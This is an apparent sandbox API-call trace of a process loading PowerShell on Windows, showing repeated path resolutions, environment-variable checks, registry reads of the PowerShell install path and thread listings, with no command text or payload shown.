	[0229.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.022] VirtualQuery (in: lpAddress=0x25b570, lpBuffer=0x25c430, dwLength=0x30 | out: lpBuffer=0x25c430*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0244.027] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0244.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.028] CoTaskMemFree (pv=0x3f5ba0) 
	[0244.037] VirtualQuery (in: lpAddress=0x25b570, lpBuffer=0x25c430, dwLength=0x30 | out: lpBuffer=0x25c430*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0244.505] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0244.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.505] CoTaskMemFree (pv=0x3f5ba0) 
	[0244.508] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0244.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.508] CoTaskMemFree (pv=0x3f5ba0) 
	[0244.510] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0244.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.510] CoTaskMemFree (pv=0x3f5ba0) 
	[0244.518] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0244.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.518] CoTaskMemFree (pv=0x3f5ba0) 
	[0244.523] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0244.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.523] CoTaskMemFree (pv=0x3f5ba0) 
	[0244.524] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0244.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.524] CoTaskMemFree (pv=0x3f5ba0) 
	[0244.529] VirtualQuery (in: lpAddress=0x25b570, lpBuffer=0x25c430, dwLength=0x30 | out: lpBuffer=0x25c430*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0244.542] VirtualQuery (in: lpAddress=0x25b570, lpBuffer=0x25c430, dwLength=0x30 | out: lpBuffer=0x25c430*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0249.952] VirtualQuery (in: lpAddress=0x25b570, lpBuffer=0x25c430, dwLength=0x30 | out: lpBuffer=0x25c430*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.370] CoTaskMemFree (pv=0x3f5ba0) 
	[0252.022] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3f5fe0
	[0258.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f6200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.650] CoTaskMemFree (pv=0x3f6200) 
	[0259.356] CoTaskMemAlloc (cb=0x104) returned 0x3f6200
	[0259.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f6200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.356] CoTaskMemFree (pv=0x3f6200) 
	[0259.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.101] VirtualQuery (in: lpAddress=0x25b820, lpBuffer=0x25c6e0, dwLength=0x30 | out: lpBuffer=0x25c6e0*(BaseAddress=0x25b000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0265.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0265.115] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25d5fc, lpData=0x0, lpcbData=0x25d5f8*=0x0 | out: lpType=0x25d5fc*=0x1, lpData=0x0, lpcbData=0x25d5f8*=0x56) returned 0x0
	[0265.115] CoTaskMemAlloc (cb=0x5a) returned 0x1b982210
	[0265.115] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25d5cc, lpData=0x1b982210, lpcbData=0x25d5c8*=0x56 | out: lpType=0x25d5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25d5c8*=0x56) returned 0x0
	[0265.115] CoTaskMemFree (pv=0x1b982210) 
	[0265.115] RegCloseKey (hKey=0x364) returned 0x0
	[0265.116] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25d5fc, lpData=0x0, lpcbData=0x25d5f8*=0x0 | out: lpType=0x25d5fc*=0x1, lpData=0x0, lpcbData=0x25d5f8*=0x56) returned 0x0
	[0265.116] CoTaskMemAlloc (cb=0x5a) returned 0x1b982210
	[0265.116] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25d5cc, lpData=0x1b982210, lpcbData=0x25d5c8*=0x56 | out: lpType=0x25d5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25d5c8*=0x56) returned 0x0
	[0265.116] CoTaskMemFree (pv=0x1b982210) 
	[0265.116] RegCloseKey (hKey=0x364) returned 0x0
	[0265.118] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b963280 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0265.118] CoTaskMemFree (pv=0x1b963280) 
	[0265.118] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0265.119] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b963280 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0265.119] CoTaskMemFree (pv=0x1b963280) 
	[0265.119] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0265.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f6200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.125] CoTaskMemFree (pv=0x3f6200) 
	[0265.128] CoTaskMemAlloc (cb=0x104) returned 0x3f6200
	[0265.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f6200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.128] CoTaskMemFree (pv=0x3f6200) 
	[0265.130] CoTaskMemAlloc (cb=0x104) returned 0x3f6200
	[0265.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f6200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.130] CoTaskMemFree (pv=0x3f6200) 
	[0265.133] CoTaskMemAlloc (cb=0x104) returned 0x3f6200
	[0265.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f6200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.133] CoTaskMemFree (pv=0x3f6200) 

Thread:
	id = 323
	os_tid = 0xc78


Thread:
	id = 325
	os_tid = 0xc88


Thread:
	id = 328
	os_tid = 0xc9c


Thread:
	id = 330
	os_tid = 0xca4


Thread:
	id = 332
	os_tid = 0xcb4


Thread:
	id = 338
	os_tid = 0xcd4


Thread:
	id = 339
	os_tid = 0xcdc

	[0124.298] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0151.188] CloseHandle (hObject=0x324) returned 1
	[0151.189] CloseHandle (hObject=0x13) returned 1
	[0151.189] CloseHandle (hObject=0xf) returned 1
	[0151.189] RegCloseKey (hKey=0x310) returned 0x0
	[0151.190] RegCloseKey (hKey=0x30c) returned 0x0
	[0151.190] RegCloseKey (hKey=0x308) returned 0x0
	[0151.190] LocalFree (hMem=0x4038b0) returned 0x0
	[0151.190] RegCloseKey (hKey=0x330) returned 0x0
	[0151.190] LocalFree (hMem=0x4038e0) returned 0x0
	[0179.857] RegCloseKey (hKey=0x1c8) returned 0x0
	[0212.713] RegCloseKey (hKey=0x360) returned 0x0
	[0212.713] RegCloseKey (hKey=0x35c) returned 0x0
	[0212.713] RegCloseKey (hKey=0x358) returned 0x0
	[0212.714] RegCloseKey (hKey=0x354) returned 0x0
	[0212.714] RegCloseKey (hKey=0x350) returned 0x0
	[0212.714] RegCloseKey (hKey=0x34c) returned 0x0
	[0212.714] RegCloseKey (hKey=0x340) returned 0x0
	[0212.715] RegCloseKey (hKey=0x33c) returned 0x0
	[0212.715] RegCloseKey (hKey=0x338) returned 0x0
	[0212.715] RegCloseKey (hKey=0x334) returned 0x0
	[0212.715] RegCloseKey (hKey=0x324) returned 0x0
	[0212.715] RegCloseKey (hKey=0x310) returned 0x0
	[0212.716] RegCloseKey (hKey=0x30c) returned 0x0
	[0212.716] RegCloseKey (hKey=0x370) returned 0x0
	[0212.716] RegCloseKey (hKey=0x164) returned 0x0
